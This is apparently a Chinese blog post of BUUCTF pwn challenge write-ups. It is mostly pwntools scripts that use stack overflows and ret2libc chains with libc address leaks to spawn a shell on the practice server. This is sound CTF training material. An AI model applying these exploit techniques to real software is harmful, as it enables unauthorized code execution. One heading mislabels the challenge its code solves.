【pwn學(xué)習(xí)】buuctf pwn題目(二)

下班了繼續(xù)做

level0

先checksec一下




很簡(jiǎn)單的道理就是vulner函數(shù)里面存在漏洞call到callsystem就好了



就覆蓋0x80個(gè)就好了

算了之后這種簡(jiǎn)單題就直接給payload吧

ciscn_2019_n_1

這道題看了源碼是逆向加pwn
逆向完就很簡(jiǎn)單了
就直接ret2libc
因?yàn)槭?4所以需要找一下gadget
直接貼代碼吧

#coding=utf8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.terminal = ['tmux','splitw','-h']
context.arch = 'amd64'

local = 0

if local:
    cn = process('./ciscn_2019_c_1')
    bin1 = ELF('./ciscn_2019_c_1',checksec=False)
else:
    cn = remote('node3.buuoj.cn', 29644)
    bin1 = ELF('./ciscn_2019_c_1')

def z(a=''):
    if local:
        gdb.attach(cn,a)
        if a == '':
            raw_input()

# z('b*0x0400AD6\nc')

pop_rdi = 0x00400c83 # pop rdi ; ret
main_addr = 0x0400B28
cn.sendline('1')
cn.recvuntil('encrypted\n')

payload = flat(
        'A'*0x50, 0 , pop_rdi, bin1.got['puts'],bin1.plt['puts'],main_addr
    )

cn.sendline(payload)
cn.recvuntil('O\n')
puts_addr = u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")

cn.sendline('1')
cn.recvuntil('encrypted\n')

payload = flat(
        'A'*0x50, 0 ,0x0400B27, pop_rdi, str_bin_sh,system_addr
    )

cn.sendline(payload)

cn.interactive()

babyrop

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'
#p=process("./babyrop")
p=remote('node3.buuoj.cn', 26990)


elf=ELF("./babyrop")

#gdb.attach(p)
payload="\x00\x00\x00\x00"+"a"*(0x2c-0x25-0x4)+"\xff"
p.sendline(payload)
p.recvuntil("Correct\n")


write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x08048825


payload="a"*0xE7+p32(0xdeadbeef)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)


p.sendline(payload)


write_addr=u32(p.recv(4))
print "write_addris "+hex(write_addr)


libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")


print "libc_base is "+hex(libc_base)
print "system_addr is "+hex(system_addr)
print "str_bin_sh is "+hex(str_bin_sh)


payload="\x00\x00\x00\x00"+"a"*(0x2c-0x25-0x4)+"\xff"
p.sendline(payload)
p.recvuntil("Correct\n")
payload="a"*0xE7+p32(0xdeadbeef)+p32(system_addr)+p32(main_addr)+p32(str_bin_sh)


p.sendline(payload)
p.interactive()

ciscn_2019_n_1


關(guān)鍵函數(shù)好像棧溢出覆蓋成這個(gè)就好了
沒(méi)試過(guò)小數(shù)



值就存儲(chǔ)在這個(gè)位置所以只要蓋成這個(gè)就好了


#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.terminal = ['tmux','splitw','-h']
context.arch = 'i386'

local = 1

if local:
    cn = process('./ciscn_2019_n_1')
    # bin = ELF('./task_shoppingCart',checksec=False)
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    # libc = ELF('/lib/i386-linux-gnu/libc.so.6',checksec=False)

else:
    cn = remote('node3.buuoj.cn', 27179)
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    pass


def z(a=''):
    if local:
        gdb.attach(cn,a)
        if a == '':
            raw_input()

z('b*0x04006A2')
# system_addr = 0x08048F0E
payload = flat('A'*(0x30-0x4),0x41348000)

cn.sendline(payload)
cn.interactive()

ciscn_2019_en_2

一樣的payload

#coding=utf8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.terminal = ['tmux','splitw','-h']
context.arch = 'amd64'

local = 0

if local:
    cn = process('./ciscn_2019_c_1')
    bin1 = ELF('./ciscn_2019_c_1',checksec=False)
else:
    cn = remote('node3.buuoj.cn', 26666)
    bin1 = ELF('./ciscn_2019_en_2')

def z(a=''):
    if local:
        gdb.attach(cn,a)
        if a == '':
            raw_input()

# z('b*0x0400AD6\nc')

pop_rdi = 0x00400c83 # pop rdi ; ret
main_addr = 0x0400B28
cn.sendline('1')
cn.recvuntil('encrypted\n')

payload = flat(
        'A'*0x50, 0 , pop_rdi, bin1.got['puts'],bin1.plt['puts'],main_addr
    )

cn.sendline(payload)
cn.recvuntil('L \n')
puts_addr = u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")

cn.sendline('1')
cn.recvuntil('encrypted\n')

payload = flat(
        'A'*0x50, 0 ,0x0400B27, pop_rdi, str_bin_sh,system_addr
    )

cn.sendline(payload)

cn.interactive()
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容